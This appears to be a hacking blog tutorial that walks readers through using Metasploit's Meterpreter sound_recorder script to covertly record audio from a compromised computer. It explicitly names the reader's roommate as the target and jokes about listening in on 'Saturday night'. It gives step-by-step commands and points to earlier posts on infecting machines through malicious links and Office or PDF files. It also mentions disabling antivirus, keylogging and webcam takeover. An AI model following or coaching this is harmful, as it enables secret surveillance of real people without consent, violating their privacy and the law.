Welcome back, my tenderfoot hackers!
So many of you responded positively to my post about using the keylogger, as well as my post regarding turning on the webcam, that I decided that you might enjoy another similar hack. In this article, we will enable the audio recording capability on the remote system of your roommate.
Once again, let's fire up Metasploit from BackTrack and embed the Meterpreter on the remote or victim system. There are a number of ways of doing this, so check back to my earlier posts to see how to install it via a malicious clickable link, a malicious Microsoft Office document or Adobe Acrobat file, and more.
From here, we should have a Meterpreter prompt on our system that reflects the control panel of the Meterpreter on the remote victim system.
Here we have almost total control of their system. We can turn off their antivirus system, embed a software keylogger, turn on their webcam, etc. In this case, we will use a script that turns on the sound recording on our roommate's computer system and enables us to play back this recording at a later time.
As this script is relatively new (2010), let's make certain that your version of Metasploit has the sound recorder script. First, open a second terminal and navigate to the following directory.
root@bt > cd /opt/metasploit/msf3/scripts/meterpreter
Once we are in this directory, simply do a listing of all files by typing:
root@bt: /opt/metasploit/msf3/scripts/meterpreter ls -l
The script should appear among the list of meterpreter scripts. If it doesn't, you can either update your Metasploit by typing in the msfconsole:
msf > msfupdate
Or you can download the script here.
Make sure that you save it to the directory /opt/metasploit/msf3/scripts/meterpreter.
Now that we have the script in the proper directory, let's run it. First, let's look at the help file by typing:
meterpreter > run sound_recorder -h
Notice that we have just a couple options. We can specify the number of 30 second intervals to record with the –i switch and the directory to save the recorded file to with the –l switch. So, let's record 15 minutes (30 x 30 seconds = 15 minutes) of our roommate and save the file in the /etc directory. We can do this by typing:
meterpreter > run sound_recorder -i 30 -l /etc
When the recording has completed and run its course, the Meterpreter will save the recording to a file on our system in the directory we specified, or in this case the /etc directory.
Now we simply need to run that audio file in an audio player and we can hear everything that was going on in our roommate's room during that 15 minutes.
This could be fun! Who knows what might be on that 15 minutes of recording every Saturday night!